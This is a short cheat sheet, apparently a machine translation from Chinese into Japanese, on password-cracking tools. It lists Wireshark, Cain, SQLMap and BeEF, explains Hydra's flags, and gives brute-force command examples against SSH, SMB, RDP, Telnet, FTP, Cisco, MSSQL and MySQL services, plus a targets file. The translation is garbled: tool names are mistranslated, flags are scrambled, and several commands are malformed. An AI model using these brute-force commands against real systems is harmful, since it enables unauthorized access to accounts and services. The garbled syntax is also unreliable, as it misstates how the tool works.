ネットワークモニター:
wiresharkの
カイン
パスワードブラスト:
悪弊
詳細なパラメータ:
進捗-Rクラック継続する時間 -S SSLプロトコル接続が 指定されたポートは、-s 指定したユーザ名-l -L辞書指定したユーザー名(ファイル) -Pは、パスワードクラッキングを指定 -p指定したパスワード辞書(ファイル)は、 空のパスワードの検出を-eユーザーパスワードとプローブ(NS)を指定 スプリット:-Cユーザー名を使用することができます(ユーザ名:パスワードは)-l代わりに-pユーザー名・パスワードを使用することができ 、出力ファイル-o マルチスレッドの数を指定-tを、デフォルトは16件のスレッドです 詳細な手順を示して-vV ターゲットサーバのIP サービスは、サービス名を指定します(telnet、FTP、HTTP、mysqlのは、ssh)
ケースを使用します。
SSHをクラック: ハイドラ-L -P PASSWORD.TXT -vV USER.TXT -e -o ssh.log NS IP SSHの 亀裂のSMB: ハイドラ-l管理者-P PASSWORD.TXT IP、SMBの 亀裂のRDP: ハイドラIP RDP -l管理者- P PASSWORD.TXTの-Vの クラックのTelnet: ハイドラIPのTelnet管理-P -l -t 32 -s 23はPASSWORD.TXT NS -f -e -Vある 亀裂のFTP: ハイドラFTP PASSWORD.TXT IP -l -t管理者-P(デフォルトの16スレッド)-vV FTP IPは-l管理者は-P -e NS -vV PASSWORD.TXTハイドラ :シスコクラック ハイドラ-Pは、Cisco IP PASSWORD.TXT ハイドラ-m -Pクラウド10.58.26.98はCISCO-有効PASSWORD.TXT
ブレークのSQLServerをパスワード:
hydra.exe -l SA -P C:\ PASSWORD.TXT 192.168.25.26 MSSQL
クラックMySQLのパスワード:
-lルート-P cをhydra.exe:\ PASSWORD.TXT 192.168.25.26 mysqlの
通过文件来指定攻击目标(可以自定义端口):
hydra -l admin -p admin -M targets.txt ftp
targets.txt:
foo.bar.com target.com:21 unusual.port.com:2121 default.used.here.com 127.0.0.1 127.0.0.1:2121
SQLMAP
牛肉